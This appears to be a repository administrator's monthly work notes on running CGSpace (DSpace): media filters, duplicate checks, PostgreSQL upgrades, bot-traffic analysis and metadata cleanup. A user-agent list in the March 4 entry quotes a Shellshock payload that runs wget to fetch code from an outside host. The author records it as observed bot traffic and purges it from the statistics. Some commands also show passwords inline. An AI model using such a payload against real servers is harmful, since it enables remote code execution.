at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
```
## 2022-02-04
- I found a thread on the dspace-tech mailing list about the `media-filter` crash above
- The problem is that the default filter for Word files is outdated, so we need to switch to the PoiWordFilter extractor
- After changing that I was able to filter the Word file on that item above:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
org.dspace.app.mediafilter.PoiWordFilter
File: Agreement_on_the_Estab_of_ILRI.doc.txt
FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
```
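- The switch itself should just be a one-line change to the `plugin.named.org.dspace.app.mediafilter.FormatFilter` mapping in `dspace.cfg`, something like this (the exact line in the stock config is from memory, so this is a sketch):
```console
$ sed -i 's/org.dspace.app.mediafilter.WordFilter = Word Text Extractor/org.dspace.app.mediafilter.PoiWordFilter = Word Text Extractor/' dspace/config/dspace.cfg
```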
- Meeting with the repositories working group to discuss issues moving forward in the One CGIAR
## 2022-02-07
- Gaia sent me her feedback on the duplicates for the TAC and ICW items for CGSpace a few days ago
- I used the IDs marked "delete" in her spreadsheet to create a custom text facet with this GREL in OpenRefine:
```console
or(
isNotNull(value.match('1')),
isNotNull(value.match('4')),
isNotNull(value.match('5')),
isNotNull(value.match('6')),
isNotNull(value.match('8')),
...
isNotNull(value.match('178')),
isNotNull(value.match('186')),
isNotNull(value.match('188')),
isNotNull(value.match('189')),
isNotNull(value.match('197'))
)
```
- Then I flagged all of these (seventy-five items)...
- I decided to flag the deletes instead of starring the keeps because there are some items in the original file that were not marked as duplicates, so we have to keep those too
- I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
```
- Then I sent this second batch of items to Gaia to look at
## 2022-02-08
- Create a SAF archive for the first 200 items (IDs 1 to 200) that were *not* flagged as duplicates and upload them to a [new collection on DSpace Test](https://dspacetest.cgiar.org/handle/10568/117921):
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
```
- Fix some occurrences of "Hammond, Jim" to be "Hammond, James" on CGSpace
- Start a full index on AReS
## 2022-02-09
- UptimeRobot said that CGSpace was down yesterday evening, but when I looked it was up and I didn't see a high database load or anything wrong
- Maria from Bioversity wrote to say that CGSpace was very slow also...
## 2022-02-10
- Looking at the Munin graphs on CGSpace I see several metrics showing that there was likely just increased load...
![Firewall packets day](/cgspace-notes/2022/02/fw_packets-day-fs8.png)
![DSpace sessions day](/cgspace-notes/2022/02/jmx_dspace_sessions-day-fs8.png)
![Tomcat pool day](/cgspace-notes/2022/02/jmx_tomcat_dbpools-day-fs8.png)
![PostgreSQL connections day](/cgspace-notes/2022/02/postgres_connections_db-day-fs8.png)
- I extract the logs from nginx for yesterday so I can analyze the traffic:
```console
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
# wc -l /tmp/feb9-ips.txt
11636 /tmp/feb9-ips.txt
```
- I started resolving them with my `resolve-addresses-geoip2.py` script
- In the mean time I am looking at the requests and I see a new user agent: `1science Resolver 1.0.0`
- Seems to be a defunct project from Elsevier (website down, Twitter account inactive since 2020)
- I also see 3,400 requests from `EyeMonIT_bot_version_0.1_(http://www.eyemon.it/)`, but because it has "bot" in the name it gets heavily throttled...
- I wonder who is monitoring CGSpace with that service...
- Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:
```console
$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
79 24940
89 36908
100 9299
107 2635
110 44546
111 16509
118 7552
120 4837
123 50245
123 55836
147 45899
173 33771
192 39832
202 32934
235 29465
260 15169
466 14618
607 24757
768 714
1214 8075
```
- The same information, but by org name:
```console
$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
92 Orange
100 Hetzner Online GmbH
100 Philippine Long Distance Telephone Company
107 AUTOMATTIC
110 ALFA TELECOM s.r.o.
111 AMAZON-02
118 Viettel Group
120 CHINA UNICOM China169 Backbone
123 Reliance Jio Infocomm Limited
123 Serverel Inc.
147 VNPT Corp
173 SAFARICOM-LIMITED
192 Opera Software AS
202 FACEBOOK
235 MTN NIGERIA Communication limited
260 GOOGLE
466 AMAZON-AES
607 Ethiopian Telecommunication Corporation
768 APPLE-ENGINEERING
1214 MICROSOFT-CORP-MSN-AS-BLOCK
```
- Most of these are pretty normal except "Serverel" and Hetzner perhaps, but their user agents are pretending to be normal users so who knows...
- I decided to look in the Solr stats with `facet.limit=1000&facet.mincount=1` and found a few more definitely non-human agents:
- scalaj-http/2.4.2
- scpitspi-rs
- lua-resty-http
- AHC/2.1
- acebookexternalhit <---- typo, but purge it!!!
- Iframely/1.3.1 (+https://iframely.com/docs/about) Atlassian
- qbhttp/1.0.0
- got (https://github.com/sindresorhus/got)
- colly - https://github.com/gocolly/colly/v2
- article-parser/4.2.10
- SomeRandomText
- adreview/1.0
- I added them to the ILRI override in the DSpace spider list and ran the `check-spider-hits.sh` script:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 234 hits from randint in statistics
Purging 337 hits from Koha in statistics
Purging 1164 hits from scalaj-http in statistics
Purging 1528 hits from scpitspi-rs in statistics
Purging 3050 hits from lua-resty-http in statistics
Purging 1683 hits from AHC in statistics
Purging 1129 hits from acebookexternalhit in statistics
Purging 534 hits from Iframely in statistics
Purging 1022 hits from qbhttp in statistics
Purging 330 hits from ^got in statistics
Purging 156 hits from ^colly in statistics
Purging 38 hits from article-parser in statistics
Purging 1148 hits from SomeRandomText in statistics
Purging 3126 hits from adreview in statistics
Purging 217 hits from 1science in statistics
Total number of bot hits purged: 14696
```
- I don't have time right now to add any of these to the COUNTER-Robots list...
- Peter asked me to add a new item type on CGSpace: Opinion Piece
- Map an item on CGSpace for Maria since she couldn't find it in the item mapper
## 2022-02-11
- CGSpace is slow and the load has been over 400% for a few hours
- The number of DSpace sessions seems normal, even lower than a few days ago
- The number of PostgreSQL connections is low, but I see there are lots of "AccessShare" locks (green on Munin, not blue like usual)
- I will run all system updates, copy the latest config changes, and restart the server
## 2022-02-12
- Install PostgreSQL 12 on my local dev environment to start testing DSpace 6.x workflows with it:
```console
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
```
- Eventually I will update DSpace Test, then CGSpace (time to start paying off some technical debt!)
- Start a full Discovery re-index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 292m49.263s
user 201m26.097s
sys 3m2.459s
```
- Start a full harvest on AReS
## 2022-02-14
- Last week Gaia sent me her notes on the second batch of TAC/ICW documents (items 201 to 400 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('201')),
isNotNull(value.match('203')),
isNotNull(value.match('209')),
isNotNull(value.match('209')),
isNotNull(value.match('215')),
isNotNull(value.match('220')),
isNotNull(value.match('225')),
isNotNull(value.match('226')),
isNotNull(value.match('227')),
...
isNotNull(value.match('396'))
)
```
- Then I flagged all matching records and exported a CSV to use with SAFBuilder
- Then I imported the SAF bundle on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
```
- Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
```
- I sent these 300 items to Gaia...
## 2022-02-16
- Upgrade PostgreSQL on DSpace Test from version 10 to 12
- First, I installed the new version of PostgreSQL via the Ansible playbook scripts
- Then I stopped Tomcat and all PostgreSQL clusters and used `pg_upgrade` to upgrade the old version:
```console
# systemctl stop tomcat7
# pg_ctlcluster 10 main stop
# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
# pg_ctlcluster 12 main stop
# pg_dropcluster 12 main
# pg_upgradecluster 10 main
# pg_ctlcluster 12 main start
```
- After that I [re-indexed the database indexes using a query](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/):
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- I saw that the index on `metadatavalue` shrunk by about 200MB!
- After testing a few things I dropped the old cluster:
```console
# pg_dropcluster 10 main
# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
```
## 2022-02-17
- I updated my `migrate-fields.sh` script to use field names instead of IDs
- The script now looks up the appropriate `metadata_field_id` values for each field in the metadata registry
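- The lookup is just a join against the metadata registry tables, for example (using `cg.contributor.affiliation` as an illustration):
```console
$ psql -d dspace -c "SELECT r.metadata_field_id FROM metadatafieldregistry r JOIN metadataschemaregistry s ON r.metadata_schema_id = s.metadata_schema_id WHERE s.short_id = 'cg' AND r.element = 'contributor' AND r.qualifier = 'affiliation';"
```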
## 2022-02-18
- Normalize the `text_lang` attributes of metadata on CGSpace:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2838588
en | 1082
| 801
fr | 2
vn | 2
en_US. | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
UPDATE 1884
dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
UPDATE 2
dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
UPDATE 1
```
- I then exported the entire repository and did some cleanup on DOIs
- I found ~1,200 items with no `cg.identifier.doi`, but which had a DOI in their citation
- I cleaned up and normalized a few hundred others to use https://doi.org format
- I'm debating using the Crossref API to search for our DOIs and improve our metadata
- For example: https://api.crossref.org/works/10.1016/j.ecolecon.2008.03.011
- There is good data on publishers, issue dates, volume/issue, and sometimes even licenses
- I cleaned up ~1,200 URLs that were using HTTP instead of HTTPS, fixed a bunch of handles, removed some handles from DOI field, etc
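- A quick way to poke at one of those Crossref records from the command line (the `jq` selectors follow Crossref's documented response format):
```console
$ curl -s 'https://api.crossref.org/works/10.1016/j.ecolecon.2008.03.011' | jq '.message | {publisher, volume, issue, issued, license}'
```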
## 2022-02-20
- Yesterday I wrote a script to check our DOIs against Crossref's API and then did some investigation on dates, volumes, issues, pages, and types
- While investigating issue dates in OpenRefine I created a new column using this GREL to show the number of days between Crossref's date and ours:
```console
abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
```
- In *most* cases Crossref's dates are more correct than ours, though there are a few odd cases that I don't know what strategy I want to use yet
- Start a full harvest on AReS
## 2022-02-21
- I added support for checking the license of DOIs to my Crossref script
- I exported ~2,800 DOIs and ran a check on them, then merged the CGSpace CSV with the results of the script to inspect in OpenRefine
- There are hundreds of DOIs missing licenses in our data, even in this small subset of ~2,800 (out of 19,000 on CGSpace)
- I spot checked a few dozen in Crossref's data and found some incorrect ones, like on Elsevier, Wiley, and Sage journals
- I used a series of GREL expressions in OpenRefine that ended up filtering out DOIs from these prefixes:
```console
or(
value.contains("10.1017"),
value.contains("10.1007"),
value.contains("10.1016"),
value.contains("10.1098"),
value.contains("10.1111"),
value.contains("10.1002"),
value.contains("10.1046"),
value.contains("10.2135"),
value.contains("10.1006"),
value.contains("10.1177"),
value.contains("10.1079"),
value.contains("10.2298"),
value.contains("10.1186"),
value.contains("10.3835"),
value.contains("10.1128"),
value.contains("10.3732"),
value.contains("10.2134")
)
```
- Many, many of Crossref's records are correct where we have no license, and in some cases more correct when we have a different license
- I ran license updates on ~167 DOIs in the end on CGSpace
## 2022-02-24
- Update some audience metadata on CGSpace:
```console
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
UPDATE 354
dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
UPDATE 2
```
## 2022-02-25
- A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401 to 700 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('405')),
isNotNull(value.match('410')),
isNotNull(value.match('412')),
isNotNull(value.match('414')),
isNotNull(value.match('419')),
isNotNull(value.match('436')),
isNotNull(value.match('448')),
isNotNull(value.match('449')),
isNotNull(value.match('450')),
...
isNotNull(value.match('699'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
```
## 2022-02-26
- Upgrade CGSpace (linode18) to Ubuntu 20.04
- Start a full AReS harvest
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-03.md
---
title: "March, 2022"
date: 2022-03-01T16:46:54+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-03-01
- Send Gaia the last batch of potential duplicates for items 701 to 980:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
```
<!--more-->
## 2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
- Here are some of the more prevalent or weird ones:
- axios/0.21.1
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
- Nutraspace/Nutch-1.2 (www.nutraspace.com)
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
- Crowsnest/0.5 (+http://www.crowsnest.tv/)
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- metha/0.2.27
- ZaloPC-win32-24v454
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
- FullStoryBot/1.0 (+https://www.fullstory.com)
- Link Validity Check From: http://www.usgs.gov
- OSPScraper (+https://www.opensyllabusproject.org)
- () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
- I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
```
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
## 2022-03-05
- Start AReS harvest
## 2022-03-10
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701 to 980 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
```
## 2022-03-12
- Update all containers and rebuild OpenRXV on linode20:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then run all system updates and reboot
- Start a full harvest on AReS
## 2022-03-16
- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
## 2022-03-20
- Start a full harvest on AReS
## 2022-03-21
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
## 2022-03-22
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
- I had been meaning to update my local database...
- I re-imported the CGIAR CAS documents to [DSpace Test](https://dspacetest.cgiar.org/handle/10568/118432) and generated the PDF thumbnails:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
```
- On my local environment I decided to run the `check-duplicates.py` script one more time with all 700 items:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
```
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down
- I looked and found many locks belonging to the REST API application:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
301 dspaceWeb
2390 dspaceApi
```
- Looking at nginx's logs, I found the top addresses making requests today:
```console
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
1977 45.5.184.2
3167 70.32.90.172
4754 54.195.118.125
5411 205.186.128.185
6826 137.184.159.211
```
- 137.184.159.211 is on DigitalOcean using this user agent: `GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28`
- I blocked this IP in nginx and the load went down immediately
- 205.186.128.185 is on Media Temple, but it's OK because it's the CCAFS publications importer bot
- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
- 70.32.90.172 is on Media Temple and has no user agent
- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
- I verified it works as expected with an empty user agent:
```console
$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
```
- I note that the nginx log shows '-' for a request with an empty user agent, which makes it indistinguishable from a request whose user agent is a literal '-'; for example, these were successful:
```console
70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
```
- I can only assume that these requests used a literal '-' so I will have to add an nginx rule to block those too
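- Something like this nginx map should catch both the empty and the literal '-' user agent (a rough sketch with an illustrative file name, not necessarily the exact rule I will end up deploying):
```console
# cat /etc/nginx/conf.d/blank-user-agents.conf
map $http_user_agent $blank_user_agent {
    default    0;
    ""         1;
    "-"        1;
}
# ...and then in the server block: if ($blank_user_agent) { return 403; }
```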
- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester... I should ask Macaroni Bros about that
## 2022-03-24
- Maria from ABC asked about a reporting discrepancy on AReS
- I think it's because the last harvest was over the weekend, and she was expecting to see items submitted this week
- Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
- She asked if we can download them and upload them directly to CGSpace
- I re-created my local Artifactory container
- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
- One thing I realized is that OAI is no longer a standalone web application, it is part of the `server` app now: http://localhost:8080/server/oai/request?verb=Identify
- Deploy PostgreSQL 12 on CGSpace (linode18) but don't switch over yet, because I see some users active
- I did this on DSpace Test in 2022-02 so I just followed the same procedure
- After that I ran all system updates and rebooted the server
## 2022-03-25
- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
![PostgreSQL database size day](/cgspace-notes/2022/03/postgres_size_cgspace-day.png)
- The space saving in indexes of recent PostgreSQL releases is awesome!
- Import a DSpace 6.x database dump from production into my local DSpace 7 database
- I see I still get the same errors [I saw in 2021-04]({{< relref "2021-04.md" >}}) when testing DSpace 7.0 beta 5
- I had to delete some old migrations, as well as all Atmire ones first:
```console
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
```
- Then I was able to migrate to DSpace 7 with `dspace database migrate ignored` as the [DSpace upgrade notes say](https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace)
- I see that the [flash of unstyled content bug](https://github.com/DSpace/dspace-angular/issues/1357) still exists on dspace-angular... ouch!
- Start a harvest on AReS
## 2022-03-26
- Update dspace-statistics-api to Falcon 3.1.0 and [release v1.4.3](https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3)
## 2022-03-28
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
```console
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
```
- I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Abenet and I noticed 1,735 items in CTA's community that have the title "delete"
- We asked Peter and he said we should delete them
- I exported the CTA community metadata and used OpenRefine to filter all items with the "delete" title, then used the "expunge" bulkedit action to remove them
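- A rough sketch of that workflow, in case I need it again (the handle and file names here are illustrative, and `bulkedit.allowexpunge` needs to be enabled if I remember correctly):
```console
$ dspace metadata-export -i 10568/XXXXX -f /tmp/cta.csv
$ # in OpenRefine: keep only the rows with title "delete", add an "action" column with the value "expunge", and export
$ dspace metadata-import -f /tmp/cta-expunge.csv
```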
- I realized I forgot to clean up the old Let's Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
- I also removed the pre-Ubuntu 20.04 Let's Encrypt stuff from the Ansible infrastructure playbooks
## 2022-03-29
- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
```
- After that I did some normalization on the `cg.subject.system` metadata and extracted a few dozen countries to the country field
- Start a harvest on AReS
## 2022-03-30
- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
```console
$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
```
